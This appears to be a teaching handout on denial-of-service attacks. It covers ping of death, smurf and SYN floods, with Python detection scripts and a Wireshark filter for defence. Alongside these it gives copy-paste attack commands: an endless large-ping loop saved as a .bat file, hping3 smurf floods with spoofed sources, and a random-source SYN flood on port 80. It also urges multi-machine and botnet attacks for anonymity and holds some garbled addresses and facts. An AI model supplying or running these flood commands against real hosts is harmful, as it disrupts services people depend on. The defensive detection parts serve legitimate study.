What is a Denial of Service Attack? How to DoS Attack
What is Denial of Service Attack (DoS)?
● DoS is an attack used to deny legitimate users access to a resource, such as a website, network or email, or to make that resource extremely slow.
● DoS is the acronym for Denial of Service.
● This type of attack is usually implemented by hitting the target resource, such as a web server, with too many requests at the same time.
● This results in the server failing to respond to all the requests.
● The effect of this can either be crashing the servers or slowing them down.
Cons.
● Cutting off some business from the internet can lead to significant loss of business or money.
● The internet and computer networks power a lot of businesses. Some organizations, such as payment gateways and e-commerce sites, depend entirely on the internet to do business.
Types of Denial of Service (DoS) Attacks
● DoS – this type of attack is performed by a single host.
● Distributed DoS – this type of attack is performed by a number of compromised machines that all target the same victim. It floods the network with data packets.
Ping of Death
Well, that’s the negative side of the ping packet. When we increase the
size of the ping packet unnaturally, forming a malformed ping packet to
attack a computer system, this type of attack is called a “ping of death”
attack.
● The ping command is usually used to test the availability of a
network resource. It works by sending small data packets to the
network resource. The ping of death takes advantage of this and
sends data packets above the maximum limit (65,536 bytes) that
TCP/IP allows.
Ping of Death
● At the primary level, a ping packet is generally 56 bytes in size, or 84 bytes including the IP header. However, a ping packet can also be made as large as 65,536 bytes.
● TCP/IP fragmentation breaks the packets into small chunks that are sent to the server. Since the sent data packets are larger than what the server can handle, the server can freeze, reboot, or crash.
● A ping packet can also be malformed to perform a denial of service
attack by sending continuous ping packets to the target IP
address. A constant ping will cause buffer overflow at the target
system and will cause the target system to crash.
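The receiving side's defence against the oversized ping described above is a bounds check on every fragment before reassembly. The following is an added example, not part of the original slides: it checks whether a fragment's offset plus its data would push the datagram past the 65,535 bytes that the 16-bit IPv4 Total Length field can describe. The function names and the sample headers are constructed for illustration.

```python
import struct

MAX_DATAGRAM = 65535  # IPv4 Total Length is a 16-bit field

def build_header(total_len, offset_units, more_fragments, proto=1):
    """Constructed 20-byte IPv4 header for the samples (checksum left at 0)."""
    flags_frag = (0x2000 if more_fragments else 0) | offset_units
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, flags_frag,
                       64, proto, 0, bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))

def reassembled_end(header):
    """Byte position where this fragment's data ends in the reassembled datagram."""
    ver_ihl, _tos, total_len, _ident, flags_frag = struct.unpack("!BBHHH", header[:8])
    ihl = (ver_ihl & 0x0F) * 4          # header length in bytes
    offset = (flags_frag & 0x1FFF) * 8  # fragment offset is stored in 8-byte units
    return ihl + offset + (total_len - ihl)

def is_oversized_fragment(header):
    """True if accepting this fragment would make the datagram exceed 65,535 bytes."""
    return reassembled_end(header) > MAX_DATAGRAM

# Constructed samples (not captured traffic):
SAMPLES = {
    "ordinary 84-byte ping": build_header(84, 0, False),
    "last fragment of a 65,500-byte ping payload": build_header(408, 8140, False),
    "fragment that runs past the limit": build_header(1500, 8189, False),
}

def classify(samples=SAMPLES):
    """Map each sample name to True (drop) or False (accept)."""
    return {name: is_oversized_fragment(hdr) for name, hdr in samples.items()}

if __name__ == "__main__":
    for name, oversized in classify().items():
        print(f"{name}: {'DROP (oversized)' if oversized else 'ok'}")
```

A reassembly routine that applies this check to each fragment as it arrives never allocates or copies past the end of its buffer, which is the failure the slide describes.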
● Disclaimer: This article was purely written for educational
purposes.
To Do DDoS (Ping Of Death Attack) Using CMD
● Open the command prompt.
● Copy the following command and paste it in cmd.
● ping <IP Address> -t -l 65500
● Replace the “<IP Address>” with the target’s IP Address.
● By using “-t” you’re specifying that the system shouldn’t stop pinging until it’s manually stopped by you, the user.
● “65500” is the data load.
Using Notepad.
Open the Notepad app.
Copy and paste the following commands.
:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop
In the above command, replace <IP Address> with an IP address.
Save the Notepad with any name. Let’s say dos.txt
Right click on the dos.txt and click on rename.
Change the extension from .txt to .bat
So, now the file name should be dos.bat
Double click on it and you will see a command prompt running with a lot
of pings.
Smurf
sudo apt-get install hping3
Detail
● This type of attack uses large amounts of Internet Control Message Protocol (ICMP) ping traffic targeted at an Internet Broadcast Address.
● The reply IP address is spoofed to that of the intended victim.
● All the replies are sent to the victim instead of the IP used for the pings.
● Since a single Internet Broadcast Address can support a maximum of 255 hosts, a smurf attack amplifies a single ping 255 times.
● The effect of this is slowing down the network to a point where it is impossible to use it.
Smurf attacks using hping3
hping3 is a network tool used to send and receive packets to and from a host
or network. It is similar to the ping command but offers more advanced features,
including the ability to send different types of packets and customize various
packet parameters.
Play the game
● Here, the attacker spoofs the IP address of the victim 1.1.1.2 and sends a broadcast message to 1.1.1.255.
● All other victim machines 1.1.1.3, 1.1.1.4, 1.1.1.5, 1.1.1.6 receive the message and respond back to 1.1.1.2 (spoofed IP of the victim) instead of 1.1.1.1 (attacker). This creates a DDoS situation for the server.
● Smurf attacks occur when a spoofed source address sends a large amount of ICMP packets to the broadcast address. Hosts on that network will then respond back, as they are supposed to respond back to broadcast addresses. This causes a denial-of-service situation on the local LAN.
● Typically, you would want your network devices to not send a directed broadcast through the interface, so the packet is dropped and nothing bad occurs.
● But, if that infrastructure-based configuration is not set, the smurf attack will be successful.
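On a network where directed broadcasts are not dropped, the pattern in the walkthrough above is easy to spot in a capture: one echo request addressed to the subnet broadcast address, followed by echo replies from many hosts to the address in its source field. The following is an added example, not part of the original slides, that flags that pattern; the function name, the threshold and the /24 prefix length are assumptions, and the records are constructed from the slide's addresses.

```python
import ipaddress
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type numbers

def smurf_indicators(packets, subnets, min_responders=3):
    """packets: (src, dst, icmp_type) tuples; subnets: CIDR strings we monitor."""
    broadcasts = {ipaddress.ip_network(s).broadcast_address for s in subnets}
    requests = defaultdict(int)    # claimed source -> echo requests sent to a broadcast address
    responders = defaultdict(set)  # reply destination -> distinct hosts that answered
    for src, dst, icmp_type in packets:
        if icmp_type == ECHO_REQUEST and ipaddress.ip_address(dst) in broadcasts:
            requests[src] += 1
        elif icmp_type == ECHO_REPLY:
            responders[dst].add(src)
    # A victim is an address that appears to have pinged the whole subnet
    # and is now being answered by many hosts at once.
    return {victim: {"broadcast_requests": requests[victim], "responders": sorted(hosts)}
            for victim, hosts in responders.items()
            if victim in requests and len(hosts) >= min_responders}

# Constructed records using the addresses from the slide (a /24 is assumed):
SAMPLE = [
    ("1.1.1.3", "1.1.1.4", ECHO_REQUEST),    # ordinary unicast ping
    ("1.1.1.4", "1.1.1.3", ECHO_REPLY),
    ("1.1.1.2", "1.1.1.255", ECHO_REQUEST),  # source field carries the victim's address
    ("1.1.1.3", "1.1.1.2", ECHO_REPLY),
    ("1.1.1.4", "1.1.1.2", ECHO_REPLY),
    ("1.1.1.5", "1.1.1.2", ECHO_REPLY),
    ("1.1.1.6", "1.1.1.2", ECHO_REPLY),
]

if __name__ == "__main__":
    for victim, info in smurf_indicators(SAMPLE, ["1.1.1.0/24"]).items():
        print(f"{victim}: answered by {len(info['responders'])} hosts "
              f"after {info['broadcast_requests']} broadcast echo request(s)")
```

The ordinary ping between 1.1.1.3 and 1.1.1.4 is not reported, because its request was not sent to a broadcast address.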
Let’s break down
● hping3 -1 --flood -a 192.168.33.123 192.168.1.255
● -1 --icmp: default
● --flood: It sends packets as more...
● -a 192.168.33.123: This option sets the source IP address for the packets being sent. Here, the source IP is set to 192.168.33.123.
● 192.168.1.255: This specifies the target IP address or network. In this case, the target is 192.168.1.255, which is the broadcast address for the subnet 192.168.1.0/24. Sending packets to the broadcast address means they will be sent
Step 1: In Kali, type the command $ nmap 196.168.176.129 (Target’s IP address, i.e. Ubuntu)
Step 2: $ nmap -sP 196.168.176.129 (Run a fast scan on the target system, but bypass host discovery.)
Step 3: $ nmap -Pn -sP 196.168.176.129 (The nmap utility can be used to detect the operating system of a particular target)
Step 4: $ ping 196.168.176.129
Step 5: (In Ubuntu System) $ sudo tcpdump -i ens33
Step 6: (In Kali) $ hping3 --icmp -c 1 --spoof 196.168.176.129 196.168.176.255
The source IP changes every time a SYN packet is sent to the target machine. Because of this, the target will never get to know which actual IP the packet is coming from, thus making the attacker anonymous over the internet.
Flooding the target computer with data packets doesn’t have much effect on the victim. In order for the attack to be more effective, one should attack the target computer with pings from more than one computer. This attack can be used to attack routers, web servers etc.
How To Perform TCP SYN Flood DoS Attack & Detect It With Wireshark - Kali Linux Hping3
DoS attacks are simple to carry out, can cause serious downtime, and aren’t always obvious. In a SYN flood attack, a malicious party exploits the TCP protocol 3-way handshake to quickly cause service and network disruptions, ultimately leading to a Denial of Service (DoS) Attack.
How TCP SYN Flood Attacks Work
● When a client attempts to connect to a server using the TCP protocol (e.g. HTTP or HTTPS), it is first required to perform a three-way handshake before any data is exchanged between the two. Since the three-way TCP handshake is always initiated by the client, it sends a SYN packet to the server.
● The server next replies acknowledging the request and at the same time sends its own SYN request – this is the SYN-ACK packet. Then finally the client sends an ACK packet which confirms that both hosts agree to create a connection. The connection is therefore established and data can be transferred between them.
● In a SYN flood, the attacker sends a high volume of SYN packets to the server using spoofed IP addresses, causing the server to send a reply (SYN-ACK) and leave its ports half-open, waiting for a reply from a host that doesn’t exist.
● In a simpler, direct attack (without IP spoofing), the attacker will simply use firewall rules to discard SYN-ACK packets before they reach him.
CPU memory consumption
● By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s resources.
● In this state, the target struggles to handle traffic, which in turn will increase CPU usage and memory consumption, ultimately leading to the exhaustion of its resources (CPU and RAM).
● At this point the server will no longer be able to serve legitimate client requests, ultimately leading to a Denial-of-Service.
How To Perform A TCP SYN Flood Attack With Kali Linux & Hping3
● # sudo apt-get install hping3
● In most cases, attackers will use hping or another tool to spoof random IP addresses, so that’s what we’re going to focus on. The line below lets us start and direct the SYN flood attack to our target (192.168.1.159):
● # hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159
● We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each.
● We’re specifying that the SYN Flag (-S) should be enabled, with a TCP window size of 64 (-w 64).
● To direct the attack to our victim’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible.
● As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection but at the same time stop the victim’s SYN-ACK reply packets from reaching the attacker.
How To Detect A SYN Flood Attack With Wireshark
● Straight away, though, admins should be able to note the start of the attack by a huge flood of TCP traffic. We can filter for SYN packets without an acknowledgment using the following filter: tcp.flags.syn == 1 and tcp.flags.ack == 0
● We can also view Wireshark’s graphs for a visual representation of the uptick in traffic. The I/O graph can be found via the Statistics>I/O Graph menu. It shows a massive spike in overall packets from near 0 to up to 2400 packets a second.
● By removing our filter and opening the protocol hierarchy statistics, we can also see that there has been an unusually high volume of TCP packets.
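The same test the Wireshark filter applies by hand can be automated so that the spike raises an alert instead of waiting for someone to open the I/O graph. The following is an added example, not part of the original slides: it counts SYN-without-ACK packets per second per destination and reports seconds in which most of them never completed the handshake. The function names and both thresholds are assumptions, and the records are constructed.

```python
from collections import defaultdict

SYN, ACK = 0x02, 0x10  # bits in the TCP flags byte

def is_bare_syn(flags):
    """Same test as the filter tcp.flags.syn == 1 and tcp.flags.ack == 0."""
    return bool(flags & SYN) and not flags & ACK

def syn_flood_alerts(records, rate_threshold=100, min_unanswered=0.9):
    """records: (timestamp, src, sport, dst, dport, tcp_flags) tuples."""
    syns = defaultdict(set)  # (second, dst, dport) -> clients that sent a bare SYN
    completed = set()        # (src, sport, dst, dport) that sent the final ACK
    for ts, src, sport, dst, dport, flags in records:
        if is_bare_syn(flags):
            syns[(int(ts), dst, dport)].add((src, sport))
        elif flags & ACK and not flags & SYN:
            completed.add((src, sport, dst, dport))
    alerts = []
    for (second, dst, dport), clients in sorted(syns.items()):
        half_open = sum((s, p, dst, dport) not in completed for s, p in clients)
        if len(clients) >= rate_threshold and half_open / len(clients) >= min_unanswered:
            alerts.append({"second": second, "target": f"{dst}:{dport}",
                           "syns": len(clients), "half_open": half_open,
                           "sources": len({s for s, _ in clients})})
    return alerts

def constructed_capture(target="192.168.1.159"):
    """Constructed records: 5 normal handshakes, then 300 unanswered SYNs in one second."""
    recs = []
    for i in range(5):
        client, t = f"192.168.1.{20 + i}", 9.0 + i / 10
        recs.append((t, client, 40000 + i, target, 80, SYN))
        recs.append((t + 0.01, target, 80, client, 40000 + i, SYN | ACK))
        recs.append((t + 0.02, client, 40000 + i, target, 80, ACK))
    for i in range(300):
        recs.append((10 + i / 1000, f"198.51.100.{i % 250 + 1}", 1024 + i, target, 80, SYN))
    return recs

if __name__ == "__main__":
    for alert in syn_flood_alerts(constructed_capture()):
        print(alert)
```

Requiring both a high SYN rate and a high share of half-open connections keeps a busy but healthy server, where clients do send the final ACK, from triggering the alert.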
Try to create DDOS attack with bot
https://gbhackers.com/kali-linux-tutorial-dos-attack/#google_vignette
https://www.tutorialsfreak.com/ethical-hacking-tutorial/dos-practical
https://www.firewall.cx/tools-tips-reviews/network-protocol-analyzers/performing-tcp-syn-flood-attack-and-detecting-it-with-wireshark.html
https://www.wallarm.com/what/smurf-ddos-attack
https://www.geeksforgeeks.org/program-to-find-class-broadcast-and-network-addresses/
https://techofide.com/blogs/what-is-smurf-attack-what-is-the-denial-of-service-attack-practical-ddos-attack-step-by-step-guide/